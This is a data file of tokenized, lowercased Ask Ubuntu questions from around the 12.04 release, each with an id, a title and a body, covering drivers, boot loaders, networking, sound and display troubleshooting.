145769	how do i get a canon lbp 2900 printer working ?	i am unable to set up my canon lbp2900 printer on ubuntu12.04 64 bit i aliened the 64 bit rpm drivers and then installed the drivers ( version 2.40 ) and followed the procedure in the canon guide ( however i changed fifo path to //localhost:59787 ( somebody suggested ) instead of 59687 ( as suggested by canon guide ) ) intially i got the message pstocapt failed .. the drivers had put the pstocapt and backend/ccp in the lib64 directory instead of the lib directory ... i copied that to the aproprite directory under lib but still i get the error `` ccp send_data error exit `` i also tried with fifo path //localhost:59687 i also tried the radu script but the drivers the script uses are version 1.90 and has conflicting packages
145771	ubuntu to xp remote desktop connection	i 'm trying to remote desktop connect to my windows xp laptop from my ubuntu machine . i am using remmina desktop client . both the computers in question are at home and both are on the same wireless internet connection . i do n't know what information to put in what fields in the remmina profile box . any help would be much appreciated
145772	desktop sms client in ubuntu	hi i am looking for some kind of script/software that can help me to send sms from my ubuntu machine . a desktop client/application actually by using web services which we use to send sms like way2sms.com or 160by2.com etc .
145773	grub2 with burg : duplicate windows entries , how do i remove one ?	i have a dual boot system with ubuntu 12.04 and windows 7 , using grub2 ( with burg ) as boot loader . for some reason , the windows installation shows up twice in the boot menu : ubuntu gnu/linux , with linux 3.2.0-24-generic ubuntu gnu/linux , with linux 3.2.0-24-generic ( recovery mode ) windows 7 ( loader ) ( on /dev/sda1 ) windows 7 ( loader ) ( on /dev/sda2 ) if i look in my partition table , /dev/sda2 is c : \ of the windows installation , and /dev/sda1 is the `` system reserved '' partition ( which , iirc , is windows ' own bootloader ) . furthermore , gparted shows /dev/sda2 - but no other partitions - with a boot flag : what is going on here ? i 'd like to have only the entries for ubuntu and one entry for windows in my boot menu - how do i remove one of them ?
145781	how do i completely remove windows vista after installing ubuntu ?	i do n't like windows vista at all and wish to remove it
145785	bridged networking with 64 bit ubuntu 12.04 server as host to a kvm virtualized setup	i saw two other similar posts on this topic but my situation is slightly different . basically , i need to set up bridged networking that uses static ip ( not dhcp ) on an ubuntu 12.04 host running kvm . i 'm pretty new to this area of things and have seen a couple tutorials ; but , what i 've seen so far is pretty old stuff . i did create an /etc/network/interfaces file for that purpose which can be seen here : http : //paste.ubuntu.com/1020623/ problem is , it breaks name resolution on the host when i configure that setup on the system . someone pointed out a step in a tutorial i was using that i had completely missed : [ quote ] 3 . after removing networkmanager , edit /etc/resolv.conf and add in your nameserver . nameserver 192.168.0.1 [ /quote ] when i do a `` less /etc/resolv.conf '' the contents of the file indicate that it is not to be edited by hand . that any changes made to the file will be overwritten later . can someone outline the way to set up bridged networking with static ip with 64 bit ubuntu 12.04 server ? thank you
145791	fix maximised 2d panel window buttons	i 'm using the unity 2d panel and when i maximise a window , i notice the buttons on the panel are n't the same as the theme . when i use ambiance , the buttons are fixed , so what do i have to do in order to fix this ? if it 's any help , i 'm using the zukitwo theme with different window buttons
145800	sound stopped working	i ran through the troubleshooting at https : //help.ubuntu.com/community/soundtroubleshooting it did not play the test sound , and it also does not play sounds during speaker-test . it does play sounds when i adjust my volume on my computer ( using pommed ) . it worked just the other day , but this is the first time i 've tested it since last night , when i put it to pm-suspend-hybrid and it half-woke up ( the backlight came on , but it did n't fully wake up ) , then went back , then half-woke again , but was frozen like that . i had to do a manual reboot of the machine when that happened . now my sound does n't work , except for adjusting the volume ( where the little `` beep '' sound plays ) . during the troubleshooting , it recognized my sound card , the sound modules , and the sound card 's installation . i 've tried removing ~/.pulse , but to no avail . also , if it 's any help , pulseaudio is running , but pulseaudio -- check returns nothing , which the manpage suggests indicates an error . edit : i should probably clarify that the wake up from the suspend-hybrid was not provoked in any way . i was laying in bed when i noticed my room was brighter suddenly , so i got up to check on it .
145803	ubuntu 12.04 display issue	since ubuntu 12.04 , my insignia tv says no signal on vga after booting . i switched to hdmi and all is well but there is no audio output . after logging in to my account , i can switch back to vga and then all is fine . how do i change the startup resolution so it can display on vga ?
145805	computer becomes unreachable on lan after some time	i work on my laptop and ssh into my desktop . i use a lot of key based authentication for many servers for work but recently i could n't login because ssh would pick up and try all the keys and it stops trying before ultimately falling back to password based login . so right now i am using this command : ssh -x -o pubkeyauthentication=no ashfame @ 192.168.1.4 # deskto the issue is after sometime the desktop would just become unreachable from laptop . i wo n't be able to open its localhost through ip and today i tried ping'in it and found a weird thing . instead of 192.168.1.4 , it tries to ping 192.168.1.3 which i am sure is the root cause as it just ca n't reach 192.168.1.4 when its actually trying for 192.168.1.3 ping command output : ashfame @ ashfame-xps : ~ $ ping 192.168.1.4 ping 192.168.1.4 ( 192.168.1.4 ) 56 ( 84 ) bytes of data . from 192.168.1.3 icmp_seq=1 destination host unreachable from 192.168.1.3 icmp_seq=2 destination host unreachable from 192.168.1.3 icmp_seq=3 destination host unreachable from 192.168.1.3 icmp_seq=4 destination host unreachable from 192.168.1.3 icmp_seq=5 destination host unreachable from 192.168.1.3 icmp_seq=6 destination host unreachable from 192.168.1.3 icmp_seq=7 destination host unreachable from 192.168.1.3 icmp_seq=8 destination host unreachable from 192.168.1.3 icmp_seq=9 destination host unreachable ^c -- - 192.168.1.4 ping statistics -- - 10 packets transmitted , 0 received , +9 errors , 100 % packet loss , time 9047ms pipe 3 also the ping command message comes in multiple and not one by one . ( izx answer 's the weirdness i thought there was in ping command . ) i did check for desktop , its local ip is still the same , so something is going on in my laptop . any ideas ? p.s . - laptop runs ubuntu 12.04 & desktop runs ubuntu 11.10 laptop is connected through wifi to router and desktop is connected through lan to router . update : even after setting up static ip leases in router settings , i again ran into this issue .
145810	battery icon / power indicator not shown in menu bar after upgrade to 12.04	since the upgrade from 11.10 to 12.04 the battery icon / power indicator is not shown any more in the menu bar . i went to 'system settings ' -- > 'power ' and tried to set 'show battery status in menu bar ' to 'always ' , however the selection button seems to be corrupt . strangely , when i open the power settings dialog , the 'show battery status in menu bar ' field is set to an empty string instead of showing one of the three possible choices . when i click on the small arrow next to it , the three possible choices are shown . whatever i select , upon closing the settings dialog and reopening it , the selection field is back to empty .
145812	how to make a partition windows can read ?	i have installed ubuntu 12.04 and i need to make a new partition out of my system partition . that partition should be readable by windows 7 in order to ease dual boot with ubuntu . how can i proceed ?
145820	does ubuntu have drivers for an ibm thinkpad t40 ?	does ubuntu have drivers available for this laptop ? and which version of ubuntu would be recommended for the t40 ? t40 specs for reference cpu : pentium m 1.3-1.6 ghz video : ati radeon 7500 32mb ram : 256 mb standard/2gb max connectivity : intel fast/gigabit ethernet , intel pro/wireless 2100 802.11b wifi
145821	how do i force x to use the vesa driver ?	i have an old nvidia card not supported anymore ( ti4200go agp 8x ) . the nouveau driver has problems drawing the cursor and shows ugly pictures on the screen . how do i try the vesa driver ? i 'm sad the vesa wo n't display the full 1680x1050 native resolution , but at least the laptop will be usable .
145823	black screen after installing ubuntu 12.04	: ) after installing ubuntu 12.04 from a cd , everything goes perfectly until i restart the computer ( after the installation process ) im not able to see the login screen , i just get a black screen ! so i press randomly keys and sometimes im able to see the background wallpaper but almost instantly the black screen appears . i think that i have to update the nvidia drivers or something like this i tried to start from the recovery mode , update my package , but still the same problem i ca n't start with the graphical interface as well , i get an error message 'no screen ' ! ! i dont understand why i have this problem because before the installation im able to try ubuntu ( from the cd ) and works perfect . thanks ! !
145824	how to couple unity launcher with window opened by intellij ?	i 've written a launcher for intellij idea . if i start idea , the new icon is shown in the unity launcher , but with a blank app label . if i drag and drop the launcher from dash to the unity launcher , it contains the correct app label with right the x-ayatana-desktop-shortcuts . if i start idea from the unity launcher , new idea icon appears . i 'd like to have only one icon in the unity launcher , so somehow couple the launcher with the app window .
145832	nautilus does n't allow me to access files	i recently backed up the home partition of my hard drive , using an ubuntu livecd and gparted . now every time i navigate to the partition a little padlock icon appears in the corner of the file/folder , and the only way to access the file is to use nautilus as the superuser .
145838	ca n't see myself in skype video call	i 'm running 12.04 and i 've installed skype via the software centre . as with 11.10 everything works fine with 12.04 as well . there is only one thing that does not work . i ca n't see myself in skype video calls . the video call works fine , i can see the other side the other side can see me . buid in microphone works . if i click on 'show myself ' during the video call nothing happens . i know that it works on ubuntu in general as i had it working a while back on a different machine ( xubuntu 11.04 ) . could that be related to the gpu ? i 'm now on a intel/nvidia one . any ideas where i can hunt for some options or tweaking ?
145846	ca n't manipulate files in ubuntu	i have a problem on my ubuntu machine . when i try to open some file in an editor like nano , vi or sudo gedit , nothing shows up , but nano ~/.bashrc works fine without any problem . i have two user accounts on my ubuntu system , and it 's the same problem with the other user account .
145849	can i move the password field to the center of the login screen ?	i am using ubuntu 11.10 ( i reverted back from 12.04 to 11.10 because of stability issues ) . i would like to know is it possible to change the location of the password field in the login screen ?
145851	ubuntu 12.04 freezing	when i close google 'chrome ( sometimes it happens with other apps ) the system freezes for 5-7 seconds , even the mouse does n't move . that problem is only with proprietary drivers . everything 's ok with nouveau . it 's really annoying , what can it be ? specs : nvidia geforce 9500 gt ( driver 295.40 ) , linux main 3.2.0-24-generic-pae
145852	dual monitor with different resolutions problem	i 'm on an lg r405 with a pm965 chipset and a nvidia geforce go 8400m gs gaphics card . i 'm trying to use an external monitor ( benq senseye3 g2222hdl ) through a vga out port . all was fine when installing except for the screen layouts were flip-flopped ( computer defalut setup so external monitor was to the right instead of left ) . when i moved the secondary monitor to its real position in the setup , i started getting strange problems . i loose representation of large portions of the screen , on both screens , and have to reboot . if i plug the monitor in after rebooting i get more problems than when booting up with the monitor already plugged in , but in both cases i can barely see what i 'm doing . please advice ! regards /m
145861	optimise data transfer speed from an external usb 3.0 docking ?	what can i do to optimise the data transfer speed from an external usb 3.0 docking ? i have two hdds inserted into the docking device , and i have it connected via only usb 3.0 on my laptop ( blue colored one ) . i get rsync speeds of 50mb/s but i am not sure if this is the maximum speed i can get and how i could tweak it to optimal speed .
145865	i ca n't use the right click of my notebook in ubuntu 12.04 , how can i correct this ?	if i 'm trying to click right with my touchpad ( of my packard bell easynote tx ) in ubuntu ( in windows 7 everything works fine ) i 'm only doing a left click . maybe the left click is caused by the all-over-touchpad ( there 's also touchpad on the left and the right button ) but however , i ca n't click right . ( i 'm a ubuntu newbie )
145868	fullscreen hulu in firefox minimizes when i browse on another window	i would like to browse on my main monitor while watching a full-screen video . two separate firefox windows . closes full screen with other programs as well . basically how do i force full-screen to remain that way while using other windows ?
145870	flash videos will not play	flash videos does n't work after upgrading . flash is installed . tried to uninstall and reinstall but seems that it does n't help
145872	my touchpad does n't work on dell n5110	i have a dell inspiron 5110 laptop that has problem with touchpad in ubuntu ( it 's multitouch did n't work ) . i follow this question 's guilds and my touchpad does n't work anymore . and now i use an external mouse .
145873	kubuntu 12.04 fails to login	i 've just installed kubuntu 12.04 but i 've got a problem here . when i login it shows the starting splash screen of kde but when it gets to the fourth icon it stops and the screen goes black , only showing the mouse pointer . i 'd really like to test this distro , any ideas ?
145874	distribution upgrade from 8.04 not working	i got a small , arm-based device . i edited /etc/apt/sources.list to have it pointing on old-releases.ubuntu.com instead of archive.ubuntu.com . at this point everything 's fine , the repositories are found . when i launch a distribution upgrade , nevertheless ( from 08.04 to 08.10 ) , apt looks for the new repositories at archive.ubuntu.com , and they are no longer online . i suppose it should look for them at old-releases.ubuntu.com instead , but i 'm not able to tweak in order to have it done .
145876	how to revert back to older xorg ?	since the last update of ubuntu 12.04 , the system wo n't boot into gui anymore . it states that it was unable to load the graphics drivers and gives me 4 options , these are : run in low graphics mode for 1 session reconfigure graphics troubleshoot the error exit to console login whichever option i choose , it does n't solve anything . for instance , when i choose to reconfigure graphics and then switch to vesa drivers , the screen goes back to the option list . so i configured xorg.conf to vesa myself , and i see in the update history that ubuntu updated xserver-xorg-core and xserver-common whereas i blocked these updates in synaptic since i 'm aware that updating these files caused troubles with my particular video card ( radeon hd6800 ) . so my solution is probably to revert these files to the older ( working ) versions . how can i do this please ( in particular xserver-xorg-core since i think this is the main cause of my problem ) . thanks ! output of ls /etc/x11 -app-defaults xorg.conf xreset -cursors xorg.conf-backup-120529144709 xreset.d -default-display-manager xorg.conf.fglrx-0 -xresources -fonts xorg.conf.fglrx-1 xsession -rgb.txt xorg.conf.fglrx-2 xsession.d -x xorg.conf.original-0 -xsession.options -xinit xorg.conf.original-1 -xwrapper.config -xkb xorg.conf.vesa output of sudo aptitude show xserver-xorg-core | grep versie ( read : version in flemish ) versie : 2:1.11.4-0ubuntu10.2
145878	how do i make meshlab the default viewer for stl files ?	i use a reprap open source desktop 3d printer . i often find it difficult to understand what .stl files represent , so i need to visualize them to find the file i want to print . i want to use meshlab to do that but i have n't been able to make it the default stl opener . can anyone help me make meshlab default stl viewer ?
145880	ca n't start hive and hadoop	i try to install hive and hadoop . but if i started them though this command hive -- service hiveserver it errors return like this : /home/babak/downloads/hadoop/bin/hadoop : zeile 258 : /usr/lib/java-6-sun-1.6.0.26/bin/java : datei oder verzeichnis nicht gefunden /home/babak/downloads/hadoop/bin/hadoop : zeile 289 : /usr/lib/java-6-sun-1.6.0.26/bin/java : datei oder verzeichnis nicht gefunden unable to determine hadoop version information . 'hadoop version ' returned : /home/babak/downloads/hadoop/bin/hadoop : zeile 258 : /usr/lib/java-6-sun-1.6.0.26/bin/java : datei oder verzeichnis nicht gefunden /home/babak/downloads/hadoop/bin/hadoop : zeile 289 : /usr/lib/java-6-sun-1.6.0.26/bin/java : datei oder verzeichnis nicht gefunden
145882	lost phone : is ubuntu one login linked to sim card ?	i recently lost my phone and i 'm now trying to reset all logins i could have configured before a mess starts . some of them are protected since the login is linked to the sim card ( for instance google ) : if the sim is replaced , the login is not valid any more . what about ubuntu one login ? does it work if the sim is replaced ? if the answer is no , then it 's great . if the answer if yes , it 's even great since i could remotely delete pictures on my phone through u1 and then change the login . any answer will suit me , but i need to know what strategy to adopt . thx
145887	why no library files installed for google test ?	the libgtest-dev package seems only install header files to the system , but not the static and dynamic libraries which should be installed under /usr/lib . is it a bug ?
145889	wired network disconnects when using transmition bittorrent	every time i use transmition bittorrent my adsl disconnects , and when i try to connect it again it says that there is no network hardware ( something like that ) . so i have to reboot to connect again . it 's ok if i surf the net , play online games , download from chrome etc .
145894	accidentally pasted script in terminal on 12.04 server	i was messing with munin configuration and plugins , copy/pasting some staff when i accidentally ran this in terminal : i wonder if i unintentionally messed up something : s # ! /usr/bin/perl # # plugin to monitor the number of accesses to apache servers . it handles # a list of ports passed in from a plugin configuration file . # # requirements : # - needs access to http : //localhost/server-status ? auto ( or modify the # address for another host ) . see your apache documentation on how to # set up this url in your httpd.conf . apache needs extendedstatus # enabled for this plugin to work # # tip : to see if it 's already set up correctly , just run this plugin # with the parameter `` autoconf '' . if you get a `` yes '' , everything should # work like a charm already . # # parameters supported : # # config # autoconf # # configurable variables # # url - override default status-url # port - http port numbers # # ssl - activate ssl ( add env.ssl yes in munin plugin configuration ) # urls - override default status-url ( ssl ) # ports - https port numbers ( ssl ) # # $ log $ # revision 1.13 2006/03/07 20:30:00 fra519 # adapt script for apache-ssl server . # # revision 1.12 2004/12/10 18:51:43 jimmyo # linux/apt* has been forced to lang=c , to get predictable output . # # revision 1.11 2004/12/10 10:47:47 jimmyo # change name from $ { scale } to $ { graph_period } , to be more consistent . # # revision 1.10 2004/12/09 22:12:54 jimmyo # added `` graph_period '' option , to make `` graph_sums '' usable . # # revision 1.9 2004/09/26 22:14:39 jimmyo # changd counter - > derive for some plugins . set min/max values . # # revision 1.8 2004/05/20 13:57:11 jimmyo # set categories to some of the plugins . # # revision 1.7 2004/05/14 21:16:46 jimmyo # `` upped '' som plugins from contrib/manual to auto . # # revision 1.6 2004/04/27 21:32:06 jimmyo # clarified the vlabels in the apache-plugins ( deb # 238594 ) . # # revision 1.5 2004/04/27 08:46:57 jimmyo # fixed broken autoconf in apache-* plugins ( deb # 236144 ) . # # revision 1.4 2004/02/18 15:47:35 jimmyo # the generic/apache_* plugins now have defined max values . # # revision 1.3 2004/02/03 17:17:25 jimmyo # generic/apache-plugins have been modified to properly to report the correct autoconf value . also , bugfixes in _processes and _volume . # # revision 1.2 2004/01/29 18:47:30 jimmyo # made plugins apache_* compatible with older versions of lwp : :useragent ( sf # 881411 ) . # # revision 1.1 2004/01/02 18:50:00 jimmyo # renamed occurrances of lrrd - > munin # # revision 1.1.1.1 2004/01/02 15:18:07 jimmyo # import of lrrd cvs tree after renaming to munin # # revision 1.4 2003/12/18 16:35:33 jimmyo # fail more gracefully when using uninstalled perl modules . # # revision 1.3 2003/11/07 17:43:16 jimmyo # cleanups and log entries # # # # magic markers : # % # family=auto # % # capabilities=autoconf my $ ret = undef ; my $ ssl = undef ; if ( ! eval `` require lwp : :useragent ; '' ) { $ ret = `` lwp : :useragent not found '' ; } if ( ! eval `` require crypt : :ssleay ; '' and exists $ env { 'ssl ' } ) { $ ssl = `` crypt : :ssleay not found '' ; } my $ url = exists $ env { 'url ' } ? $ env { 'url ' } : `` http : //127.0.0.1 : % d/server-status ? auto '' ; my @ port = exists $ env { 'port ' } ? split ( ' ' , $ env { 'port ' } ) : ( 80 ) ; my $ urls = exists $ env { 'urls ' } ? $ env { 'urls ' } : `` https : //127.0.0.1 : % d/server-status ? auto '' ; my @ ports = exists $ env { 'ports ' } ? split ( ' ' , $ env { 'ports ' } ) : ( 443 ) ; if ( exists $ argv [ 0 ] and $ argv [ 0 ] eq `` autoconf '' ) { if ( $ ret ) { print `` no ( $ ret ) \n '' ; exit 1 ; } if ( $ ssl ) { print `` no ( $ ssl ) \n '' ; exit 1 ; } my $ ua = lwp : :useragent- > new ( timeout = > 30 ) ; my @ badports ; foreach my $ port ( @ port ) { my $ url = sprintf $ url , $ port ; my $ response = $ ua- > request ( http : :request- > new ( 'get ' , $ url ) ) ; push @ badports , $ port unless $ response- > is_success and $ response- > content =~ /^total accesses : /im ; } if ( exists $ env { 'ssl ' } ) { foreach my $ port ( @ ports ) { my $ url = sprintf $ urls , $ port ; my $ response = $ ua- > request ( http : :request- > new ( 'get ' , $ url ) ) ; push @ badports , $ port unless $ response- > is_success and $ response- > content =~ /^total accesses : /im ; } } if ( @ badports ) { print `` no ( no apache server-status or extendedstatus missing on ports @ badports ) \n '' ; exit 1 ; } else { print `` yes\n '' ; exit 0 ; } } if ( exists $ argv [ 0 ] and $ argv [ 0 ] eq `` config '' ) { print `` graph_title apache accesses\n '' ; print `` graph_args -- base 1000\n '' ; print `` graph_vlabel accesses / \ $ { graph_period } \n '' ; print `` graph_category apache\n '' ; foreach my $ port ( @ port ) { print `` accesses $ port.label port $ port\n '' ; print `` accesses $ port.type derive\n '' ; print `` accesses $ port.max 1000000\n '' ; print `` accesses $ port.min 0\n '' ; } if ( exists $ env { 'ssl ' } ) { foreach my $ port ( @ ports ) { print `` accesses $ port.label port $ port\n '' ; print `` accesses $ port.type derive\n '' ; print `` accesses $ port.max 1000000\n '' ; print `` accesses $ port.min 0\n '' ; } } exit 0 ; } my $ ua = lwp : :useragent- > new ( timeout = > 30 ) ; foreach my $ port ( @ port ) { my $ url = sprintf $ url , $ port ; my $ response = $ ua- > request ( http : :request- > new ( 'get ' , $ url ) ) ; if ( $ response- > content =~ /^total accesses : \s+ ( .+ ) $ /im ) { print `` accesses $ port.value $ 1\n '' ; } else { print `` accesses $ port.value u\n '' ; } } if ( exists $ env { 'ssl ' } ) { foreach my $ port ( @ ports ) { my $ url = sprintf $ urls , $ port ; my $ response = $ ua- > request ( http : :request- > new ( 'get ' , $ url ) ) ; if ( $ response- > content =~ /^total accesses : \s+ ( .+ ) $ /im ) { print `` accesses $ port.value $ 1\n '' ; } else { print `` accesses $ port.value u\n '' ; } } } # vim : syntax=perl
145895	usb stick bad superblock . works absolutely fine in windows	when i plug in my 8gb cruzer blade 8gb ( formatted as fat32 ) into my ubuntu computer , i get a mount error . the command 'e2fsck -f /dev/sda1 '' gives me `` bad magic number in super-block while trying to open /dev/sda1 '' . using a backup superblock gives the same thing . problem is , it works fine on windows .
145900	`` syntax error : unexpected end of file '' simple script	i need some help for a very siple script , i do n't get were the fault is . the script : # ! /bin/bash declare -i s declare -i m declare -i h if [ `` $ 3 '' < 50 ] ; then s= $ 3+10 m= $ 2 h= $ 1 else if [ `` $ 2 '' < 50 ] ; then s= $ 3-50 m= $ 2+1 h= $ 1 else s= $ 1-50 m= $ 2-50 h= $ 1+1 fi fi echo `` $ h : $ m : $ s '' the script add 10sc to the time we 've entered . i get this error message : `` sub_change_dirrect : line 14 : syntax error : unexpected end of file ''
145902	unable to mount windows ( ntfs ) filesystem due to hibernation	whenever i boot ubuntu , i get a message that it can not mount my windows partition , and i can choose to either wait , skip or manually mount . when i try to enter my windows partition through nautilus i get a message saying that this partition is hibernated and that i need to enter the file system and properly close it , something i have done with no problem so i do n't know why this happens . here 's my partition table , if any more data is needed please let me know . device boot start end blocks id system /dev/sda1 2048 20000767 9999360 83 linux /dev/sda2 20002814 478001151 228999169 5 extended /dev/sda3 * 478001152 622532607 72265728 7 hpfs/ntfs/exfat /dev/sda4 622532608 625141759 1304576 82 linux swap / solaris /dev/sda5 20002816 478001151 228999168 83 linux
145903	how to share files and folders on a forum so that anyone can download without having an ubuntu one account ?	i just began to discover ubuntu one . i upload a video on my account , and put it in a folder . i would like to know whether it is possible to share this folder or this file simply by giving the url in forum ( in a message ) , so that anyone can download the file , with no need to have an ubuntu one account . ( a bit like photobucket , where you can share pictures and videos and folders to people with ou without photobucket , and anyone can download them ) thank you in advance for your answers .
145907	ca n't read cds , ca n't create usb ... how do i install ubuntu ?	hello everyone and thank you in advance for your time . i have troubles with the latest ubuntu distribution : since i upgraded to 12.04 ubuntu has started having troubles ( internal errors , packages that crash repeatedly , i ca n't install new packages , ubuntu software center crashes , java apps that worked stopped working and display weird mistakes , files were corrupted ... a mess ) . i ultimately decided to format everything and install 12.04 from scratch . i made a backup and everything , but now i have troubles installing ubuntu 12.04 . specifically , a cd i burned with brasero that works on another pc is not read by my laptop ( not at boot phase , nor inside ubuntu ) , and when i try to create a usb with ubuntu ( following the instructions i found on the ubuntu site ) startup disk creator stops at 22 % saying that `` the codes do not match '' . any idea on what to do next ? no , i ca n't buy a new pc .
145908	what is the ubuntu accomplishments project ?	recently i heard about a project called ubuntu accomplishments . what is it ? what are its advantages ? and how do i install it ?
145929	ca n't resolve badsig error - 12.04	i am attempting to fix a badsig error but it wont change . this is the error . reading package lists ... done w : gpg error : http : //au.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //au.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //au.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //security.ubuntu.com precise-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > i attempted to update it . sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 40976eaf437d05b5 but it does n't change . gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 sayth @ sayth-travelmate-5740g : ~ $
145930	error : no such partition . grub rescue >	please help me . i do n't know how it has happened . i was recovering some data with photorec ( not sure if it 's important ) and at night i woke up , it was still running . i was sleepy and i turned off my notebook , not closing anything , i think recovering was not finished yet . now , when i turn on notebook it is like error ... i 've tried everything i found on the internet , but nothing worked . here is what it does and what i 've tried : error : no such partition grub rescue > ls ( hd0 ) ( hd0 , msdos5 ) grub rescue > ls ( hd0 , msdos5 ) / error : unknown filesystem . so there are only two and both are unknown filesystems . i 'm sorry , i really do n't understand those things . please , please help me . thank you in advance
145935	get rid of 0.5s latency when playing audio over bluetooth with a2dp	as described in the title i experience a half a second delay when playing audio over bluetooth with a2dp . this makes watching movies not possible as the sound is not synchronised with the video . i 'm not sure if the delay is caused by the bluetooth standard , the a2pd protocol , the a2dp implementation on ubuntu 12.04 , or the belkin z73 bluetooth receiver . anyways , is this a normal lag ? is there a way to play audio over bluetooth without any noticeable latency ?
145936	ubuntu server-sysadmin package-managment docs : best to read debian 's docs ? any ubuntu-specific ?	where 's the authoritative , canonical ( no pun intended ) ubuntu software-package-management ( `` pkg-man '' for short ) docs , references ? similarly , where would one point a newbie sysadmin to canonical ubuntu pkg-man docs ? mostly interested in server-sysadmin , cmdline-oriented usage ( eg : apt-get over synaptic ) . details , background , related questions noticed these debian pkg-man docs , references : http : //wiki.debian.org/packagemanagement http : //www.debian.org/doc/manuals/debian-reference/ch02.en.html questions : are the above authoritative and canonical ( no pun intended ) for debian ? do these docs completely apply to ubuntu ? do any related , ubuntu-specific docs exist ? possibly presenting diffs between debian , ubuntu pkg-man systems , if any ?
145938	how to stop disks from being automagically mounted on boot ?	i have a btrfs filesystem raided across several disks . the machine is connected via usb to an external hard-drive bay where three disks live . in my fstab i have a mount entry for one of the disks and the path ( /dev/sdb ) . however , during boots ubuntu mounts all of the disks /dev/sdc and /dev/sdd . i 'd like to stop ubuntu from mounting the other disks during boot . is there anyway to disable auto-mounting of attached disks on boot with the exception of the ones explicitly in /etc/fstab ? here are the contents of fstab proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=eb80bbb0-7b27-4b7c-b041-639cbcae1c77 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=0e0c01be-7545-449c-86a8-60309d016534 none swap sw 0 0 /dev/sdb /media/xbmc btrfs defaults 0 1 when the machine boots i find something like this : filesystem size used avail use % mounted on /dev/sda1 294g 35g 245g 13 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 791m 892k 790m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 1.6m 2.0g 1 % /run/shm /dev/sdc 4.6t 1.3t 2.6t 34 % /media/0868831f-d234-4172-aeab-640e580190d0 /dev/sdd 4.6t 1.3t 2.6t 34 % /media/0956647d-a558-2218-febt-559a647221r5 /dev/sdb 4.6t 1.3t 2.6t 34 % /media/xbmc
145941	how do i change the icon of a epiphany web app ?	the webapps just take a thumb of whatever image they can find on the page , can i customise it ?
145942	can not play vtc video file ( .mov ) using vlc player	i have a training course contains .mov files which have video codec as apple graphics smc . i have googled and found out to add these options to play them link from where i got help but they are playing fine only in smplayer . i want to configure similarly and play those files in vlc player . this is the error which i 'm facing running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0xb0d03d20 ] blend blend error : no matching alpha blending routine ( chroma : rgba - > rgbp ) [ 0xb0d03d20 ] main blend error : blending rgba to rgbp failed it is repeating ... thanks for any help ...
145945	ssh programs terminates when closed	when i ssh into my server and launches a program and then closes the ssh , the program closes to . how do i bypass this ? the program is started with a shell script . ubuntu 12.04 64bit ubuntu server 12.04 32bit ( does n't support 64bit )
145950	can not put a animated background on ubuntu 10.10	i go to the terminal : ( applications - > accessories - > terminal ) , and typed the command sudo add-apt-repository ppa : ilap/lwp and i pressed the enter key , and in the terminal window it said : joe is not in the sudoers file . this incident will be reported .
145952	12.04 ubuntu studio preempt_rt kernel options	my audio processing needs require a preempt_rt kernel . i roughly followed the guide : https : //wiki.ubuntu.com/kernelteam/gitkernelbuild with a little help from : https : //rt.wiki.kernel.org/index.php/rt_preempt_howto currently i am using the 3.4 branch ( which is the most recent at the time of this post ) : http : //www.kernel.org/pub/linux/kernel/projects/rt/ i think i have a reasonable kernel config ( for my machine at least ) . multiple trials confirm i need the option : config_preempt_rt_full=y i have the following questions : is anyone maintaining a recent config_preempt_rt_full kernel in a ppa ? is there any interest in providing a config_preempt_rt_full in the official ubuntu-studio distribution ? does anyone have recent config pointers for a config_preempt_rt_full kernel ?
145953	how do i replace the following missing files ?	i am getting the following errors with software center file does not exist : /usr/share/software-center/softwarecenter/apt/__init__.py file does not exist : /usr/share/software-center/softwarecenter/db/__init__.py file does not exist : /usr/share/software-center/softwarecenter/view/__init__.py file does not exist : /usr/share/software-center/softwarecenter/view/widgets/__init__.py
145954	run mysql queries in ubuntu 10.04 shell ( cmd ) stored in a files ( desc order by filename )	i have a folder with about 40 sql scripts with varying names , all using the pattern number description.sql . the file number consist of 2 digits and goes from 01 to 40 , not all numbers in this range included . i would like to iterate over this folder with files and run them via mysql cmd in a desc filename order . how can i run them all via mysql cmd in order of descending file number ? thanks .
145961	how to autoconnect to ethernet network when restarting ?	firstly , i hope this has n't been covered elsewhere , i have searched but have n't found this particular problem . i updated to 12.04 a while back and though i now thoroughly regret that decision , i 'm able to live with 12.04 and all it 's odd little quirks . the one problem that i would like to fix is this . i have a small network , using a router modem which stays on most of the time . if the computer is switched off , when it is switched on again i have to click on `` auto ethernet '' in `` network '' in order to get on the internet . it then works fine . previous versions just connected automatically on restart . when 12.04 says it is unable to connect , other computers on the network are able to connect . thanks for any help .
145962	bastion on ubuntu 12.04 64 bit gives only a black screen	i just downloaded the humble bundle with the game bastion . after installing bastion and starting it up , only it shows first a few logos , and then only a black screen and the mouse pointer . i can here the sound fine . i read a message board that recommended starting it with -windowed -x 1280 -y 720 which does not work . i am on ubuntu 12.04 64 bit , with a intel 3000 integrated graphics card . does anyone know how i can get this to work properly ?
145963	alsamixer is not loaded	how do i load alsamixer ? how do i know if i am added to audio group ? i am really new to the whole command line so be as specific as possible please .
